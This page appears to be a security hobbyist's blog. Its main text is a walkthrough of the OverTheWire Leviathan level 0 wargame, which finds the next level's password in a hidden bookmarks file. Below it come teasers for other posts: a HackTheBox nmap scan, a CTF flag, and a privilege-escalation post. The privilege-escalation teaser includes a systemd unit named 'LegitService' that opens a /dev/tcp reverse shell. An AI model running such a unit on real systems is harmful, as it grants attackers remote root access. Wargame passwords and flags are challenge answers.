Skip to main content

Over the Wire - Leviathan 0

leviathan 0

Objectives
ok so the website supplies us with the user pass for level 0
leviathan0 for both

Solution
let's ssh over to it and see what we see

ssh leviathan0@leviathan.labs.overthewire.org -p 2223


Let's see whats in the home directory

leviathan0@leviathan:~$ lsleviathan0@leviathan:~$ 


Nothing, nothing is in the home direcorty.... or is there let's try ls -a

leviathan0@leviathan:~$ ls -a.  ..  .backup  .bash_logout  .bashrc  .profile


OOOO there is a hidden directory named backup lets see whats in there

leviathan0@leviathan:~$ ls -a .backup.  ..  bookmarks.html


a file called bookmarks let's see what kind of file it is

leviathan0@leviathan:~$ file ./.backup/bookmarks.html./.backup/bookmarks.html: HTML document, ASCII text, with very long lines


here is some of cat output of the file

<DT><A HREF="http://www.goshen.edu/art/DeptPgs/Hazards.html" ADD_DATE="1117951366" LAST_CHARSET="ISO-8859-1" ID="90799910">Hazards Working with Ceramics</A><DT><A HREF="http://www.goshen.edu/art/DeptPgs/clean.html" ADD_DATE="1131845742" LAST_CHARSET="ISO-8859-1" ID="77067758"><span style="font-family: times new roman,times,serif;"><span style="text-decoration: underline;">Working and Cleaning with less dust</span></span></A><DT><A HREF="http://www.goshen.edu/art/ed/help.html" ADD_DATE="1140391108" LAST_CHARSET="ISO-8859-1" ID="40227805">Advocate Link Page</A><DT><A HREF="http://www.goshen.edu/art/ed/advocacyletter.html" ADD_DATE="1130547887" LAST_CHARSET="ISO-8859-1" ID="74590933">A letter to an administrator</A><DT><A HREF="http://www.goshen.edu/art/ed/honey.html" ADD_DATE="1117091302" LAST_CHARSET="ISO-8859-1" ID="22513777">Successful Third Grade</A>




as you might expect it has a bunch of bookmark info in it... let's search it for the user name for the next level to see if maybe password is in this file

leviathan0@leviathan:~/.backup$ grep leviathan1 bookmarks.html<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>




There we go the password for level 1 is rioGegei8m

Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The